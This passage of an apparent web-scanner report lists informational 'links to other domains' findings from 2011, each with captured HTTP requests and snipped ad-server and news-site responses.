Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 01 May 2011 23:34:01 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13844

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#003366;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/%26hl%3Den%26client%3Dca-pub-7382611274909550%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BNetwork%2BSecurity%26adU%3Dwww.VillanovaU.com/Certificate%26adT%3DInfo%2BSystems%2BSecurity%26gl%3DUS&amp;usg=AFQjCNFBvg-hMDLzBe_rei6aEXkw9b9p5w" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.23. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1304328302&flash=10.2.154&url=file%3A%2F%2F%2FD%3A%2Fcdn%2Fexamples%2Fdork%2Fhttp-injection%2Fhttp-header-injection-dork-cwe-113-march-8-2011.html&dt=1304310301907&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304310302224&frm=0&adk=1607234649&ga_vid=1507467887.1304310302&ga_sid=1304310302&ga_hid=1320224918&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=967&bih=887&fu=0&ifi=1&dtd=442&xpc=c6VTuxdnT3&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 01 May 2011 23:25:04 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 7893

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/cdn/examples/dork/http-injection/http-header-injection-dork-cwe-113-march-8-2011.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DSeaEagle.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFgABCF8UUUaSUwRiz6CISITWY9wQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.24. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 02:05:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4168

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</IFRAME>
<img height="1" border="0" width="1" alt="" style="display: none;" src="http://va.px.invitemedia.com/goog_imp?returnType=image&key=AdImp&cost=Tb4RXwAHNm8K5ovHrlhLb5hGYOYV9br2QoBlYA&creativeID=110455&message=eJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=9&exchange_id=4' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe>
...[SNIP]...

23.25. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3774305288881122&format=160x600_as&output=html&h=600&w=160&lmt=1304328825&ad_type=text&color_bg=FFFFFF&color_border=FFFFFF&color_link=2E58A6&color_text=000000&color_url=006699&flash=10.2.154&url=http%3A%2F%2Fwww.24-7pressrelease.com%2Fpress-release%2Fthe-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php&dt=1304310823336&bpp=32&shv=r20110427&jsv=r20110427&correlator=1304310825810&frm=0&adk=2292603500&ga_vid=1395234486.1304310827&ga_sid=1304310827&ga_hid=585375513&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=967&bih=887&fu=0&ifi=1&dtd=4549&xpc=H13F5OeGt2&p=http%3A//www.24-7pressrelease.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 01 May 2011 23:34:53 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15566

<!doctype html><html><head><style>a{color:#2e58a6}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.24-7pressrelease.com/press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php%26hl%3Den%26client%3Dca-pub-3774305288881122%26adU%3DPhoenix.edu%26adT%3DUniversity%2Bof%2BPhoenix%25C2%25AE%26adU%3Dwww.protegrity.com%26adT%3DSecure%2BSensitive%2BData%26adU%3Dwww.vocus.com%26adT%3DAutomate%2BYour%2BPR%26adU%3Dwww.PalisadeSystems.com%26adT%3DPrevent%2BData%2BLoss%26adU%3Dwww.positivesearchresults.com%26adT%3DOnline%2BReputation%2BRuined%253F%26gl%3DUS&amp;usg=AFQjCNG9HTIvHsdmEdGhLTjYRZW-JsJ-Rg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.26. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3774305288881122&format=336x280_as&output=html&h=280&w=336&lmt=1304328827&ad_type=text&color_bg=FFFFFF&color_border=FFFFFF&color_link=2E58A6&color_text=000000&color_url=006699&flash=10.2.154&url=http%3A%2F%2Fwww.24-7pressrelease.com%2Fpress-release%2Fthe-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php&dt=1304310823371&bpp=3&shv=r20110427&jsv=r20110427&prev_fmts=160x600_as&correlator=1304310825810&frm=0&adk=2642244470&ga_vid=1395234486.1304310827&ga_sid=1304310827&ga_hid=585375513&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=967&bih=887&fu=0&ifi=2&dtd=7734&xpc=M0IEzlF3tX&p=http%3A//www.24-7pressrelease.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 01 May 2011 23:35:05 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14292

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#2e58a6;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.24-7pressrelease.com/press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php%26hl%3Den%26client%3Dca-pub-3774305288881122%26adU%3DBusinessWire.com/Press_Releases%26adT%3DSubmit%2Ba%2BPress%2BRelease%26adU%3Dvulnerability.scan.qualys.com%26adT%3DVulnerability%2BScan%26adU%3Dwww.NETGEAR.com/ProSecure%26adT%3DProSecure%2BBy%2BNETGEAR%25C2%25AE%26adU%3Dwww.IT-Colleges.edu/Criminology%26adT%3DSecurity%2BCertificates%26gl%3DUS&amp;usg=AFQjCNGt-F39jEO1blM4nKWr5jkAHbmN4w" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.27. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4675364852109088&output=html&h=90&slotname=8870801362&w=728&lmt=1304337913&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912489&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362&correlator=1304319912561&frm=0&adk=314417003&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=2&dtd=2381&xpc=vncIdHcbbl&p=http%3A//www.greenhulk.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 02:05:16 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13907

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#5c9911;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_000000.gif" title="This site accepts Google Checkout" width=19> <span class=adb>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.greenhulk.net/forums/showthread.php%253F126285-Rear-boarding-step%26hl%3Den%26client%3Dca-pub-4675364852109088%26adU%3DEmpireCovers.com/BoatCovers%26adT%3DWaterproof%2BJet%2BSki%2BCovers%26adU%3Dwww.YamahaPartsHouse.com%26adT%3DYamaha%2BBike%2B%2526amp%253B%2BATV%2BParts%26adU%3DJustAnswer.com/Seadoo%26adT%3DAsk%2Ba%2BSeadoo%2BMechanic%26gl%3DUS&amp;usg=AFQjCNGcujFchWFVWmOhQoefMTd6selsOQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.28. http://guru.sitescout.com/disp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /disp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /disp?pid=66738FF&rw=1&cm=http%3A%2F%2Fclick.adbrite.com%2Fc%2FCvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0IpipwdLQBxuLrYZgyJ7S1PvGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWCXY9D2-QHOfg6pX0b9LTtaTQI8E9Y1hXVck9VT8EmRAoIKD-Hz3s10ZMQecjaqU1-wroyCzUm10G_MBmfksRDzlEfApCpYRe4nJ4H9-0oXD48jRc9TSMbik2vsesqhIsvKOysmRbXe1I-7Vja6eSCJtFt5tcQrjLwvpdsi29oHYRBPhO6ykaJrFmFxpw4brKP1BrwMo-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0%2F&rand=69005134 HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ads-vrx.adbrite.com/adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
SAdBuild: 400
P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 7838
Date: Mon, 02 May 2011 02:27:16 GMT
Connection: close


<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="Tue, 01 Jan 2000 12:12:12 GMT">

...[SNIP]...
-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0%2F', '_blank')">
<img src="http://guru.sitescout.netdna-cdn.com/oldlady_newskin-f472355.gif" alt="Dermatologists Hate Her!"/>
</td>
...[SNIP]...
-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0%2F', '_blank')">
<img src="http://guru.sitescout.netdna-cdn.com/tv-844d3d3.jpg" alt="SHOCKING: 46" LED TV's for only $98.76!"/>
</td>
...[SNIP]...
-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0%2F', '_blank')">
<img src="http://guru.sitescout.netdna-cdn.com/52e714ff_12-12_davidson_belly-881bdb1.gif" alt="1 Trick of a Tiny Belly"/>
</td>
...[SNIP]...

23.29. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTcwJnRsPTQzMjAw&piggybackCookie=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&r=http://a.triggit.com/pxpucm HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 01:56:32 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104; domain=pubmatic.com; expires=Fri, 25-Apr-2014 18:46:33 GMT; path=/
Location: http://a.triggit.com/pxpucm
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.triggit.com/pxpucm">here</a>.</p>
<hr>
...[SNIP]...

23.30. http://insurancenewsnet.com/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://insurancenewsnet.com
Path:   /article.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /article.aspx?id=257992 HTTP/1.1
Host: insurancenewsnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=600
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=1k3l4a55gy1fk4jf5xabtr45; path=/; HttpOnly
Set-Cookie: INNid=1k3l4a55gy1fk4jf5xabtr45; expires=Tue, 01-May-2012 23:33:25 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:25 GMT
Content-Length: 74743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Insur
...[SNIP]...
<li class="MainNav" id="liNav9"><a id="ctl00_Template_navigation_hlNav9" class="MainLink" href="http://AnnuityNews.com">Annuity</a>
...[SNIP]...
<li class="MainNav" id="liNav7"><a id="ctl00_Template_navigation_hlNav7" class="MainLink" href="http://www.insurancenewsnetmagazine.com" target="_blank">INN Magazine</a>
...[SNIP]...
<div style="width:164px; height:200px; position:relative; z-index:2">
<IFRAME SRC="http://ad.doubleclick.net/adi/N4827.272700.8895614262621/B5117134.4;sz=164x200;ord=[timestamp]?" WIDTH=164 HEIGHT=200 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4827.272700.8895614262621/B5117134.4;abr=!ie;sz=164x200;ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N4827.272700.8895614262621/B5117134.4;abr=!ie4;abr=!ie5;sz=164x200;ord=[timestamp]?">
<IMG SRC="http://ad.doubleclick.net/ad/N4827.272700.8895614262621/B5117134.4;abr=!ie4;abr=!ie5;sz=164x200;ord=[timestamp]?" BORDER=0 WIDTH=164 HEIGHT=200 ALT="Advertisement"></A>
...[SNIP]...
<div style="width:164px; height:200px; position:relative; z-index:3; margin-top:-200px"><a href="http://www.insnewsnet.com/showpage.aspx?id=1919"><img src="http://www.insnewsnet.com/i/transgif.gif" width="164" height="200" border="0" /></a>
...[SNIP]...
<!-- BEGIN FACEBOOK FACEBOOK FACEBOOK -->
                <iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Finsnewsnet&amp;width=200&amp;connections=6&amp;stream=false&amp;header=false&amp;height=310" scrolling="no" frameborder="0" style="border:none; margin-top:10px; overflow:hidden; width:200px; height:310px;" allowTransparency="true"></iframe>
...[SNIP]...
<div id="ctl00_BodyContent_Repeater1_ctl00_articlediv">
